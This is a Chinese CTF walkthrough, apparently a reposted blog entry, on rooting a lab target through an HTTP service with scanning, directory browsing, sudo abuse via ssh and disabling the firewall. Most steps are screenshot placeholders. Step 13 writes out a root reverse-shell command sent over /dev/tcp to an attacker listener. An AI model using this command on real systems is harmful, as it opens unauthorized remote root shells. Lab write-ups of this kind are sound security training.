CTF--HTTP服务--命令执行

2021-04-20 01:26

阅读:501

标签:利用   http服务   dev   启动   关闭   span   网页   map   mil   

开门见山


 

1. 扫描靶机ip,发现PCS 172.18.5.1

 技术图片

 

 

2. 用nmap扫描靶机开放服务和服务版本

 技术图片

 

 

3. 再扫描靶机全部信息

 技术图片

 

 技术图片

 

 

4. 用nikto工具扫描http服务的敏感信息

 技术图片

 

 

5. 打开浏览器查看发现的网页

 技术图片

 

 

6. 查看临时缓冲目录

 技术图片

 

 

7. 查看home目录,挖掘用户信息

 技术图片

 

 

8. 查看具体用户的目录

 技术图片

 

 

9. 查看靶机的信息

 技术图片

 

 

10. 利用ssh命令,执行root权限命令

 技术图片

 

 

11. 用bill执行root权限关闭防火墙

 技术图片

 

 

12. 攻击机启动监听

 技术图片

 

 

 

13. 靶机反弹shell,使用命令:ssh bill@localhost sudo bash -i >& /dev/tcp/172.18.5.251/4444 0>& 1

 技术图片

 

 

14. 攻击机终端收到反馈shell

 技术图片

 

 

15. 还有一种shell反弹

 技术图片

 

 

16. 在 /root目录下查找flag文件并查看

 技术图片

 

 


 

CTF--HTTP服务--命令执行

标签:利用   http服务   dev   启动   关闭   span   网页   map   mil   

原文地址:https://www.cnblogs.com/joker-vip/p/12264552.html


评论


亲,登录后才可以留言!